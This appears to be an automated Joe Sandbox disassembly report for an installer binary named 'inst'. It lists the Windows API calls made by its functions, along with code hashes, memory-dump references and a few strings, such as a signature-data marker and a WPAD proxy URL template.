                                                                                                                                                                      • API String ID: 968978764-0
                                                                                                                                                                      • Opcode ID: 704491afaf1249e951fadb9609c0755f0b52a8134fdb18e1107042515855493a
                                                                                                                                                                      • Instruction ID: ec801322bbc965afa5fbc1ccf0d118d4587e886622da4bca5bbdea6fabf73bc1
                                                                                                                                                                      • Opcode Fuzzy Hash: 704491afaf1249e951fadb9609c0755f0b52a8134fdb18e1107042515855493a
                                                                                                                                                                      • Instruction Fuzzy Hash: BE418771A0060ABFDB21DBA4CC54EEEBBF9FF54344F51442AF512A6090EB716A40CB21
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001B1D0F
                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,00000064), ref: 001B1D4E
                                                                                                                                                                        • Part of subcall function 0017D354: _wcsnlen.LIBCMT ref: 0017D36B
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001B1D8B
                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 001B1DCE
                                                                                                                                                                      • OffsetRect.USER32(?,00000001,00000001), ref: 001B1DEC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: RectWindow$ClientEnabledH_prolog3OffsetText_wcsnlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2890302191-0
                                                                                                                                                                      • Opcode ID: 540b6f5a4c56aa3df82dffe949bba24a621bb4f78ba8efa33f72e3a25143b9a3
                                                                                                                                                                      • Instruction ID: 0f0097230e2f827c6607fe7dd2bf29fce2689bfeffcef158e081222ffa5ab151
                                                                                                                                                                      • Opcode Fuzzy Hash: 540b6f5a4c56aa3df82dffe949bba24a621bb4f78ba8efa33f72e3a25143b9a3
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C4138B1900609AFCF14DFA9DD85AEEBBBAFF58304F444119F605A6290DB71AA51CB20
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001B1E34
                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,00000064), ref: 001B1E5D
                                                                                                                                                                        • Part of subcall function 0017D354: _wcsnlen.LIBCMT ref: 0017D36B
                                                                                                                                                                      • GetDC.USER32(?), ref: 001B1E70
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 001B1E8B
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 001B1EFC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$H_prolog3RectText_wcsnlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1157584674-0
                                                                                                                                                                      • Opcode ID: 7bed216c0b35ff4422a2986d4e5cdb913256711ba02a9fe01f79742e1eeb8a45
                                                                                                                                                                      • Instruction ID: db15dc66df87a4ed96a93bac4a756f8dae6b4b3baf9796de14524d5f784d8a9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 7bed216c0b35ff4422a2986d4e5cdb913256711ba02a9fe01f79742e1eeb8a45
                                                                                                                                                                      • Instruction Fuzzy Hash: 93314971900609AFDB25DF95CC8ADFFBBBAFFA4304F500519E512A2190DB71A945CB21
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 001CA58E
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 001CA5B9
                                                                                                                                                                      • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 001CA5D6
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 001CA5DE
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 001CA5F3
                                                                                                                                                                        • Part of subcall function 001CA29F: GdipDrawImageRectI.GDIPLUS(?,00000000,?,?,?,?,?,?,001CFC56,?,?,?,00000000,?,?), ref: 001CA2C2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectSelect$CompatibleCreateDeleteDrawGdipImageRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 240731188-0
                                                                                                                                                                      • Opcode ID: 14183236523ff642f6f099f435f06126362deaf2158f9103fbcdb136204ad487
                                                                                                                                                                      • Instruction ID: a4f83b8f769278ce5f6d865e93aa922aa4c5668960767b010cdad76c3d0e25ae
                                                                                                                                                                      • Opcode Fuzzy Hash: 14183236523ff642f6f099f435f06126362deaf2158f9103fbcdb136204ad487
                                                                                                                                                                      • Instruction Fuzzy Hash: 6321167150021DEFCF22AF90DC45EAE7BB6FF68304F104419F902A2161DB72EA65EB91
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 5F520418
                                                                                                                                                                      • inet_addr.WS2_32(?), ref: 5F520428
                                                                                                                                                                      • WSAAsyncGetHostByName.WS2_32(00000000,00000401,?,00000000,00000400), ref: 5F52045C
                                                                                                                                                                      • WSASetLastError.WS2_32(00002733), ref: 5F52046F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AsyncErrorHostLastName_memsetinet_addr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1704644561-0
                                                                                                                                                                      • Opcode ID: 848e3ff7cb7419aafafe40cec5e82ff48b2b1bf7e3ccbd7f29108145cac146e9
                                                                                                                                                                      • Instruction ID: 3aa3dfadb86f0f5e638215b624c9a9ed033a580bf71c096a9392e7a8e2c2ed9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 848e3ff7cb7419aafafe40cec5e82ff48b2b1bf7e3ccbd7f29108145cac146e9
                                                                                                                                                                      • Instruction Fuzzy Hash: 892184B5602304ABDB00DFB4C945EAF77F8AF48724F10462EF51AEB1D1D774AA0087A0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0018DE07
                                                                                                                                                                      • _memset.LIBCMT ref: 0018DE1E
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0018DE38
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0018DE48
                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,001CE664,00000000,00000000,001CE844,?,00000000,001CE844,?,?), ref: 0018DE6A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset_wcslen$FileOperation
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1469800647-0
                                                                                                                                                                      • Opcode ID: 833dea2a8071242772c6407028b0b74254df9595f291b9d079c5a74fd725e94f
                                                                                                                                                                      • Instruction ID: b6ed53ed64f1048de018f24ed3c2a31bfee24402063d877197a2f22306147c77
                                                                                                                                                                      • Opcode Fuzzy Hash: 833dea2a8071242772c6407028b0b74254df9595f291b9d079c5a74fd725e94f
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B11517191025C9BDB21EFB8EC49AEE73A8BF18700F500429B519E7181EB3895048B55
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001CE069
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,0024CDA4,?,?), ref: 001CE07D
                                                                                                                                                                      • _memset.LIBCMT ref: 001CE08D
                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,001985B6,00000000,?,?,?,?,?,?,?), ref: 001CE0A6
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 001CE0B3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileTemp_memset$DeleteNamePath
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 433304728-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001CD400
                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 001CD422
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 001CD42C
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 001CD447
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 001CD45B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1789362936-0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 001AB670: DeleteObject.GDI32(?), ref: 001AB68C
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(?), ref: 001AEC97
                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,?), ref: 001AECA8
                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 001AECB7
                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 001AECC1
                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 001AECC8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$DeleteFindHandleLoadLockModuleObjectSizeof
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2239502561-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000000,74DF23A0,?,?,5F4F5E2D), ref: 5F5174BC
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,?,5F4F5E2D), ref: 5F5174C4
                                                                                                                                                                      • RegNotifyChangeKeyValue.KERNEL32(?,00000000,00000004,?,00000001,?,?,5F4F5E2D), ref: 5F5174F9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeEventNotifyObjectResetSingleValueWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1286042878-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __lock.LIBCMT ref: 001E4A1A
                                                                                                                                                                        • Part of subcall function 001F339F: __mtinitlocknum.LIBCMT ref: 001F33B5
                                                                                                                                                                        • Part of subcall function 001F339F: __amsg_exit.LIBCMT ref: 001F33C1
                                                                                                                                                                        • Part of subcall function 001F339F: EnterCriticalSection.KERNEL32(?,?,?,001F4EDB,0000000D,0023EFE8,00000008,001EEA68,?,00000000), ref: 001F33C9
                                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 001E4A25
                                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 001E4A34
                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,0023E890,0000000C,001F4E21,00000000,?,001F05A7,?,00000001,?,?,001F3329,00000018,0023EF60,0000000C), ref: 001E4A64
                                                                                                                                                                      • GetLastError.KERNEL32(?,001F05A7,?,00000001,?,?,001F3329,00000018,0023EF60,0000000C,001F33BA,?,?,?,001F4EDB,0000000D), ref: 001E4A75
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2714421763-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                                      • String ID: A:\
                                                                                                                                                                      • API String ID: 2427045233-3379428675
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3__memcmp_memset
                                                                                                                                                                      • String ID: [360signdata]sign=
                                                                                                                                                                      • API String ID: 1379577869-1737267629
                                                                                                                                                                      • Opcode ID: 3207b167ca5e88de9c1ef27de77977c3529cbd68bf79a95a4d15ddba2e47a480
                                                                                                                                                                      • Instruction ID: 47500fd7a01d6eddccc6ac7bd60477defb2d73bfb998051e945f500edcf216b1
                                                                                                                                                                      • Opcode Fuzzy Hash: 3207b167ca5e88de9c1ef27de77977c3529cbd68bf79a95a4d15ddba2e47a480
                                                                                                                                                                      • Instruction Fuzzy Hash: 104192B1D046189BCB24EB64CC51AEE73B8AF24315F5406AAE549E32C1E774AE848E50
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 0019854B
                                                                                                                                                                        • Part of subcall function 001E5546: _malloc.LIBCMT ref: 001E5560
                                                                                                                                                                        • Part of subcall function 0017A8EB: _wcsnlen.LIBCMT ref: 0017A91D
                                                                                                                                                                        • Part of subcall function 001CE037: _memset.LIBCMT ref: 001CE069
                                                                                                                                                                        • Part of subcall function 001CE037: GetTempPathW.KERNEL32(00000104,?,0024CDA4,?,?), ref: 001CE07D
                                                                                                                                                                        • Part of subcall function 001CE037: _memset.LIBCMT ref: 001CE08D
                                                                                                                                                                        • Part of subcall function 001CE037: GetTempFileNameW.KERNEL32(?,001985B6,00000000,?,?,?,?,?,?,?), ref: 001CE0A6
                                                                                                                                                                        • Part of subcall function 001CE037: DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 001CE0B3
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 001985F7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileTemp_memset$CountDeleteH_prolog3NamePathTick_malloc_wcsnlen
                                                                                                                                                                      • String ID: !@tmpini%^&$?rd=%d
                                                                                                                                                                      • API String ID: 431327915-4013382025
                                                                                                                                                                      • Opcode ID: 2e6743f4b829abc14e4c9f93aafd35d1277e2c22b1860077d5b2704c7bee497a
                                                                                                                                                                      • Instruction ID: aedc9f09cfe4b28c8e6b9fbe1ca7c500adac3ceba0a49d140f14dc30f95b2d40
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e6743f4b829abc14e4c9f93aafd35d1277e2c22b1860077d5b2704c7bee497a
                                                                                                                                                                      • Instruction Fuzzy Hash: FA21BA71A042089ADB14FBE4DC96BFFB3A9AF64310F000518F21AA71C2DF70A9548765
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001A30AA
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,0000019F,00000078,00000006,0000012A,PNG,00000018), ref: 001A30E5
                                                                                                                                                                        • Part of subcall function 0018E185: GetDC.USER32(?), ref: 0018E193
                                                                                                                                                                        • Part of subcall function 001E5546: _malloc.LIBCMT ref: 001E5560
                                                                                                                                                                        • Part of subcall function 00197323: CreateCompatibleDC.GDI32(?), ref: 00197347
                                                                                                                                                                        • Part of subcall function 00197323: SelectObject.GDI32(?,?), ref: 0019736E
                                                                                                                                                                        • Part of subcall function 00197323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00197387
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CompatibleCreateH_prolog3ObjectSelectViewportWindow_malloc
                                                                                                                                                                      • String ID: PNG$x
                                                                                                                                                                      • API String ID: 2666613662-1595511861
                                                                                                                                                                      • Opcode ID: 4bf33a7be8ba705eb1c8d98c4a7a230633ce022df3915faafcb4f74affe96361
                                                                                                                                                                      • Instruction ID: a86643b9bd2d77c1acc85b7f98a6ecd6e9e18db7a520fcff87ba2e335ab1980f
                                                                                                                                                                      • Opcode Fuzzy Hash: 4bf33a7be8ba705eb1c8d98c4a7a230633ce022df3915faafcb4f74affe96361
                                                                                                                                                                      • Instruction Fuzzy Hash: 3711C170A00608AFDF04EFA4C88AABEB6F6FF55314F90406CF006A71D1DB75AE059B11
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F4F4E4F: __EH_prolog3_GS.LIBCMT ref: 5F4F4E56
                                                                                                                                                                        • Part of subcall function 5F513F0C: _memset.LIBCMT ref: 5F513F3E
                                                                                                                                                                        • Part of subcall function 5F513F0C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 5F513F59
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 5F4F55EC
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 5F4F55FC
                                                                                                                                                                      Strings
                                                                                                                                                                      • _IsHaveEntClient:%d, xrefs: 5F4F55BD
                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 5F4F5606
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateEvent$H_prolog3__memsetwvnsprintf
                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Internet Settings$_IsHaveEntClient:%d
                                                                                                                                                                      • API String ID: 1875430345-55523219
                                                                                                                                                                      • Opcode ID: 8a1e7bd9fcd246d820a1973d6f7d73026419fce6c535eed3656b075ee9ee376a
                                                                                                                                                                      • Instruction ID: a31d84c14e4c1f9fe730eb51f20af833d2977c9626bde48cd3a0af39e49d3c4c
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a1e7bd9fcd246d820a1973d6f7d73026419fce6c535eed3656b075ee9ee376a
                                                                                                                                                                      • Instruction Fuzzy Hash: E4F03CB14027486BD2259BB68C44CE7BBECEFC6B65751092EF2AA56200DA316440C6A5
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F51C5EA
                                                                                                                                                                      • SendMessageW.USER32(5F5BC3F0,?,?,?), ref: 5F51C5FC
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F51C604
                                                                                                                                                                        • Part of subcall function 5F513FED: _memset.LIBCMT ref: 5F514020
                                                                                                                                                                        • Part of subcall function 5F513FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 5F51403B
                                                                                                                                                                      Strings
                                                                                                                                                                      • [CAsyncNetwork::SyncSendMsg] msg: %d cost: %d s, xrefs: 5F51C61D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick$MessageSend_memsetwvnsprintf
                                                                                                                                                                      • String ID: [CAsyncNetwork::SyncSendMsg] msg: %d cost: %d s
                                                                                                                                                                      • API String ID: 3817034548-3777656696
                                                                                                                                                                      • Opcode ID: e5fe9f97f2641d62d47b9b462adf060a0a99798c08f8b3f3bc712732eb494535
                                                                                                                                                                      • Instruction ID: ddda796f43729d6cbe721796fe3a0838a9ef3d4d20cdcd9dc67f3b4422427006
                                                                                                                                                                      • Opcode Fuzzy Hash: e5fe9f97f2641d62d47b9b462adf060a0a99798c08f8b3f3bc712732eb494535
                                                                                                                                                                      • Instruction Fuzzy Hash: F0F027779002115BE7019AB88C0CCAEBEE6DFC8120B01483BF548C3161C972CC6496A1
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4F244B
                                                                                                                                                                        • Part of subcall function 5F4F2364: _malloc.LIBCMT ref: 5F4F2387
                                                                                                                                                                        • Part of subcall function 5F4F2364: GetNetworkParams.IPHLPAPI(00000000,?), ref: 5F4F239D
                                                                                                                                                                        • Part of subcall function 5F4F2364: _malloc.LIBCMT ref: 5F4F23B3
                                                                                                                                                                        • Part of subcall function 5F4F2364: GetNetworkParams.IPHLPAPI(00000000,?), ref: 5F4F23C8
                                                                                                                                                                        • Part of subcall function 5F4F2364: _memset.LIBCMT ref: 5F4F23EF
                                                                                                                                                                        • Part of subcall function 5F4F2364: __snwprintf.LIBCMT ref: 5F4F2416
                                                                                                                                                                      • __snwprintf.LIBCMT ref: 5F4F2475
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NetworkParams__snwprintf_malloc$CountTick_memset
                                                                                                                                                                      • String ID: http://%s/wpad.dat$wpad
                                                                                                                                                                      • API String ID: 140397255-1948369278
                                                                                                                                                                      APIs
                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 5F51E70D
                                                                                                                                                                        • Part of subcall function 5F51CDE8: PostQuitMessage.USER32(00000000), ref: 5F51CECB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePostProcQuitWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3873111417-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,0016611A,?,00000000,?), ref: 001650BC
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,0016611A,?,00000000,?), ref: 0016515B
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00008000,?,00000000,?,?,?,?,?,0016611A,?,00000000,?), ref: 00165177
                                                                                                                                                                      • _memset.LIBCMT ref: 0016521E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerReadSize_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1834740430-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDeleteFileH_prolog3Thread__wcsicoll
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3249433508-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001CE69E
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,0022E544,0000005C,00000008,001CE838,?,?,0000002C), ref: 001CE75E
                                                                                                                                                                      • SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000,?,?,0000002C), ref: 001CE76B
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,0000002C), ref: 001CE7B5
                                                                                                                                                                        • Part of subcall function 0016DFB0: __CxxThrowException@8.LIBCMT ref: 0016DFC2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDirectoryErrorException@8ExistsFileH_prolog3LastPathThrow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3549841302-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 001CA689
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 001CA69E
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 001CA6CA
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 001CA6DF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectSelect$CompatibleCreateDelete
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 488333989-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F5205F7
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 5F52060C
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(5F5BC570), ref: 5F520619
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(5F5BC570), ref: 5F5206D4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$CurrentEnterH_prolog3LeaveThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1021104131-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D054C
                                                                                                                                                                        • Part of subcall function 001CA6F2: _memset.LIBCMT ref: 001CA71F
                                                                                                                                                                        • Part of subcall function 001CA6F2: _memset.LIBCMT ref: 001CA72D
                                                                                                                                                                        • Part of subcall function 001CA6F2: GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,0017BCDE), ref: 001CA741
                                                                                                                                                                        • Part of subcall function 001CA6F2: _memset.LIBCMT ref: 001CA754
